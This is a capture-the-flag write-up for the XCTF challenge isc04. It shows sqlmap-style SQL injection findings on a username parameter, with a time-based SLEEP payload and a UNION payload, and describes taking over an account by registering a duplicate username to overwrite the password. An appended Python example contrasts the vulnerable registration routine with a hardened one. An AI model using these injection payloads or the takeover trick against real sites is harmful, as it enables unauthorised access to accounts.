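xctf - 攻防世界 (Attack and Defense World) - isc04
The registration page allows an existing username to be registered again, so the password of that account can be overwritten at will.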
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=123' AND (SELECT 4750 FROM (SELECT(SLEEP(5)))Rwcs)-- wjMD

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: username=123' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7871,0x636671764e6c68695068646472496e566a455755796261766b5158714651714c514448416b6e6746,0x71786b6271),NULL-- -
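The injection yields the account name and the MD5 hash of the password, but online lookup services such as cmd5 and somd5 cannot crack the hash.
Recalling the duplicate-registration flaw found earlier, use that vulnerability to overwrite the password.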
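
An added example, not code from the challenge or from the original write-up: a minimal model of the duplicate-registration flaw next to a hardened registration routine. SQLite stands in for the MySQL backend, and the table, the function names and the sample credentials are constructed assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed model: hypothetical schema and function names, SQLite instead of MySQL.

def new_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    return db

def _hash(password, salt):
    # Salted, slow hash; a bare MD5 digest is open to lookup-table cracking.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def register_vulnerable(db, username, password):
    # Flaw: registering an existing name silently replaces the stored
    # credential, so any visitor can reset another account's password.
    salt = os.urandom(16)
    db.execute("INSERT OR REPLACE INTO users VALUES (?, ?, ?)",
               (username, salt, _hash(password, salt)))
    return True

def register_hardened(db, username, password):
    # Fix: plain INSERT; the PRIMARY KEY constraint rejects a duplicate
    # atomically, with no check-then-insert race. Bound parameters also keep
    # the username out of the SQL text, closing the injection point.
    salt = os.urandom(16)
    try:
        db.execute("INSERT INTO users VALUES (?, ?, ?)",
                   (username, salt, _hash(password, salt)))
    except sqlite3.IntegrityError:
        return False
    return True

def login(db, username, password):
    row = db.execute("SELECT salt, pw FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[1], _hash(password, row[0]))

def demo(register):
    # Returns (second registration accepted, old password works, new password works).
    db = new_db()
    register(db, "admin", "original-secret")        # constructed sample values
    second = register(db, "admin", "overwritten")   # duplicate registration
    return (second, login(db, "admin", "original-secret"),
            login(db, "admin", "overwritten"))
```

`demo(register_vulnerable)` shows the original password no longer working after the second registration, while `demo(register_hardened)` shows the duplicate being refused and the original credential intact.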